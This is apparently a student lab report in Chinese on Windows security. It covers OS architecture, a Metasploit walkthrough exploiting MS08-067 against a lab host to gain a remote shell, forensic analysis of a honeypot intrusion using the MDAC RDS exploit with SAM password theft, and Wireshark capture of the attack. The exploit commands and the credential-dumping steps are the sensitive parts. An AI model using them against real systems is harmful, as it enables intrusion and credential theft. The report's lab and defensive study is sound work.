理论知识
Windows操作系统基本机构
- Windows操作系统内核的基本模块包括:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。
- Windows操作系统在用户代码的代码模块包括:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
- Windows操作系统内核实现的核心机制:Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络机制。
安全体系结构与机制
Windows操作系统基于引用监控器模型
Windows身份认证机制:每个安全主体以时间和空间上全局唯一的SID安全标识进行标识。
- Windows为每个用户和计算机设置账户进行管理,账户权限的根本作用就是吸纳之这些账户内运行程序对系统资源对象的访问。Windows用户账户的口令经过加密处理后被保存于SAM或者活动目录AD中。
- Windows支持本地身份认证和网络身份认证。
- Windows身份认证实现原理
Windows远程安全攻防技术
Windows本地安全攻防技术
实践一:
使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
1、使用kali(192.168.200.2)作为攻击机,win2k(192.168.200.124)作为靶机.在kali中输入msfconsole进入Metasploit。
在kali命令行输入msfconsole,打开msfconsole。
search ms08_067 //search+漏洞名字
use exploit/windows/smb/ms08_067_netapi //使用exploit/windows/smb/ms08_067_netapi作为攻击目标。
输入show payloads来选择你的攻击模块,set PAYLOAD 3
set RHOST 192.168.200.124设置靶机IP,set LHOST 192.168.200.2设置攻击机IP
输入exploit开始攻击
攻击成功,发现进入了靶机的cmd界面
实践二
自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106(主机名为lab.wiretrip.net),问题分析:
攻击者使用了什么破解工具进行攻击?
首先用wireshark打开云班课上的.log文件,会看到非常多报文。根据题目先进行一下筛选ip.src == 213.116.251.162 && ip.dst ==172.16.1.106,可以发现攻击者一开始进行了HTTP访问,追踪数据流可以发现发起http请求的主机系统信息NT5.0以及响应http请求的服务端主机安装了IIS4.0服务组件。
继续往下有一个指向了一个msadcs.dll的数据包,通过搜索特征码ADM!ROX!YOUR!WORLD,得知是msadc.pl/msadc2.pl渗透脚本工具。并在msadcs.dll存在的MDAC RDS漏洞进行SQL注入
接下来使用【http.request.uri contains "msadc"】进行筛选,可以看到攻击机成功上传了工具,因为攻击者密码写错了重复了几次
尝试提升本地权限,向yay.txt和yay2.txt的文件内写指令,失败后又尝试查看用户组信息,将IUSR加入本地管理员组
获取SAM备份,在上一步获取权限之后转而去继续获取SAM密码。这次rdisk /s-备份关键系统信息,在%systemroot%
epair中会创建一个sam._的SAM压缩拷贝。
然后发现又开启了一个远程shell,成功的获取到了SAM的值,并写入文件har.txt,将SAM备份文件拷贝到IIS的根目录inetpub,并通过web方式进行了下载
在4351号数据包,攻击者写了这是他见过的最好的蜜罐。
如何防止这样的攻击:
(1)直接防御措施:打补丁
(2)进一步防御措施:禁用用不着的RDS等服务;防火墙封禁网络内部服务器发起的连接;为web server在单独的文件卷上设置虚拟根目录;使用NTFS文件系统,因为FAT几乎不提供安全功能;使用IIS Lockdown 和URLScan 等工具加强web server。
实践三
任务:
攻击方使用metaploit选择漏洞进行渗透攻击,获得控制权。
防守方使用wireshark监听获得网络攻击的数据包,结合分析过程,获得攻击者IP地址、目的IP地址和端口、攻击发起时间、攻击利用漏洞、攻击使用的shellcode,以及本地执行的命令输入信息。
前面攻击的过程和实践一一样,在攻击之前打开wireshark,然后攻击,发现许多SMB包,MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的
攻击机:192.168.200.2,靶机:192.168.200.124,目的地址的端口445,
在攻击机侵入后输入ipconfig,可以在wireshark上查看,源端口4444, 目标端口1065,时间等信息。
学习感悟、思考
通过本次实践对Windows的攻防有了基本的了解,能够进行一些简单的漏洞攻击,但对于一些原理上的内容还是理解的不够透彻。很多分析还比较浅显,还是要多寻找相关资料进行学习。